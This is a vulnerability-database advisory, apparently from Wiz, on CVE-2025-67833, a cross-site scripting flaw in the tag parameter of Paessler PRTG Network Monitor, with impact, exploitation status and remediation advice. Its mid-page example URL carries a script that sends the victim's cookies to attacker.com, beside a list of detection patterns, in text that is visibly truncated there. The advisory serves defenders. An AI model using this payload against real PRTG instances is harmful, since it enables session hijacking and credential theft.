
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-67833 is a Cross-Site Scripting (XSS) vulnerability in Paessler PRTG Network Monitor that allows unauthenticated attackers to inject malicious scripts via the tag parameter. It affects all versions of PRTG Network Monitor prior to 25.4.114.1032. The CVE was published on January 14, 2026, with initial NVD analysis completed on January 20, 2026. It carries a CVSS v3.1 base score of 6.1 (Medium), assessed by CISA-ADP (Paessler Advisory, Red Hat CVE).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), rooted in insufficient sanitization of user-supplied input in the tag parameter of the PRTG web interface. An unauthenticated remote attacker can craft a malicious URL or request containing a JavaScript payload in the tag parameter; when a victim user visits or interacts with the crafted link, the script executes in their browser within the PRTG application context. The attack requires user interaction (e.g., clicking a malicious link) but no authentication or special privileges on the part of the attacker, and the scope is changed, indicating impact extends beyond the vulnerable component (Paessler Advisory, Red Hat CVE).
Successful exploitation could allow an attacker to steal authenticated user session tokens, harvest credentials, perform unauthorized actions on behalf of the victim within PRTG, or distribute malware to users of the monitoring platform. Because PRTG Network Monitor is typically used by network administrators to oversee critical infrastructure, session hijacking could provide an attacker with visibility into or control over monitored network devices. Confidentiality and integrity are both impacted at a low level per the CVSS assessment, with no direct availability impact (Paessler Advisory, Red Hat CVE).
As of the time of reporting, there is no public proof-of-concept exploit code and no evidence of active in-the-wild exploitation. The EPSS score is approximately 0.069%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported (Red Hat CVE).
tag parameter (e.g., https://<prtg-host>/index.htm?tag=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>).tag parameter (e.g., %3Cscript%3E, <script>, onerror=, onload=).Paessler has released a patched version of PRTG Network Monitor; organizations should upgrade to version 25.4.114.1032 or later as the primary remediation (Paessler Advisory). As interim measures, restrict access to the PRTG web interface to trusted internal networks or VPN users only, and consider deploying Web Application Firewall (WAF) rules to filter malicious input in the tag parameter. Applying the principle of least privilege to PRTG user accounts can limit the impact of a successful session hijack.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."